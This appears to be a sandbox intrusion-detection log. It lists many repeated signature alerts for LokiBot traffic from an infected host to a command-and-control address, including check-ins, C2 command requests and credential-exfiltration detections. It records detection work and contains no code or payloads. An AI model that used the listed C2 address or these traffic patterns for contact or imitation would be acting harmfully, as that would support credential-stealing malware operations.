ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:29.470677
SID:	2025381
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:34.975531
SID:	2024318
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:58.921065
SID:	2025381
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:08.547895
SID:	2024318
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:55.035047
SID:	2025381
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:34.079276
SID:	2825766
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:34.975531
SID:	2024313
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:39.580792
SID:	2025381
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:03.891737
SID:	2021641
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:39.686953
SID:	2025381
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:23.194950
SID:	2024313
Source Port:	49870
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:30.339047
SID:	2021641
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:23.194950
SID:	2024318
Source Port:	49870
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:13.652600
SID:	2024313
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:25.556361
SID:	2825766
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:28.699735
SID:	2021641
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:42.736556
SID:	2024313
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:18.590588
SID:	2021641
Source Port:	49864
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:09.757970
SID:	2825766
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:15.972978
SID:	2024318
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:34.204192
SID:	2025381
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:17.815577
SID:	2825766
Source Port:	49863
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:15.972978
SID:	2024313
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:42.736556
SID:	2024318
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:53.641650
SID:	2825766
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:26.328739
SID:	2021641
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:54.422589
SID:	2021641
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:36.488685
SID:	2025381
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:45.042075
SID:	2024318
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:02.814837
SID:	2025381
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:05.124910
SID:	2025381
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:45.042075
SID:	2024313
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:24.862546
SID:	2825766
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:04.659572
SID:	2025381
Source Port:	49847
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:41.966393
SID:	2825766
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:52.096160
SID:	2021641
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:54.259588
SID:	2024318
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:45.801533
SID:	2021641
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:41.891260
SID:	2025381
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:17.112021
SID:	2021641
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:20.136720
SID:	2021641
Source Port:	49866
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:32.673178
SID:	2021641
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:13.897343
SID:	2024313
Source Port:	49860
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:24.839758
SID:	2024317
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:06.999341
SID:	2825766
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:54.259588
SID:	2024313
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:56.595283
SID:	2025381
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:35.705322
SID:	2025381
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:43.503603
SID:	2825766
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:24.839758
SID:	2024312
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:44.242163
SID:	2024318
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:17.895022
SID:	2024318
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:45.018070
SID:	2825766
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:51.314444
SID:	2024313
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:44.242163
SID:	2024313
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:13.652600
SID:	2024318
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:34.860100
SID:	2021641
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:14.423119
SID:	2825766
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:51.314444
SID:	2024318
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:41.115114
SID:	2825766
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:17.895022
SID:	2024313
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:14.663983
SID:	2021641
Source Port:	49861
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:23.301208
SID:	2025381
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:40.344957
SID:	2024318
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:40.344957
SID:	2024313
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:56.772335
SID:	2025381
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:01.546959
SID:	2825766
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:09.316933
SID:	2021641
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:18.674487
SID:	2025381
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:07.768549
SID:	2025381
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:24.137227
SID:	2025381
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:26.424765
SID:	2025381
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:29.547586
SID:	2024318
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:45.801533
SID:	2825766
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:58.128553
SID:	2021641
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:23.961991
SID:	2021641
Source Port:	49871
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:10.531874
SID:	2025381
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:29.547586
SID:	2024313
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:19.370644
SID:	2024318
Source Port:	49865
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:20.907030
SID:	2025381
Source Port:	49867
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:13.117986
SID:	2021641
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:08.980641
SID:	2024318
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:12.861151
SID:	2021641
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:19.370644
SID:	2024313
Source Port:	49865
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:31.133120
SID:	2025381
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:08.980641
SID:	2024313
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:58.128553
SID:	2825766
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:23.961991
SID:	2825766
Source Port:	49871
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:09.316933
SID:	2825766
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:20.206304
SID:	2021641
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:24.862546
SID:	2021641
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:13.117986
SID:	2825766
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:22.429106
SID:	2021641
Source Port:	49869
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:12.861151
SID:	2825766
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:12.096911
SID:	2024318
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:12.096911
SID:	2024313
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:37.305241
SID:	2021641
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:20.206304
SID:	2825766
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:02.046578
SID:	2024318
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:47.378472
SID:	2025381
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:02.046578
SID:	2024313
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:49.735329
SID:	2021641
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:38.799315
SID:	2021641
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:27.986411
SID:	2825766
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:59.991734
SID:	2025381
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:02.332845
SID:	2025381
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:45.799677
SID:	2024313
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:48.178974
SID:	2024313
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:48.957388
SID:	2025381
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:51.123133
SID:	2025381
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:00.769505
SID:	2024318
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:22.504191
SID:	2825766
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:34.079276
SID:	2021641
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:47.361321
SID:	2024313
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:22.429106
SID:	2825766
Source Port:	49869
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:21.735500
SID:	2024318
Source Port:	49794
Destination Port:	80
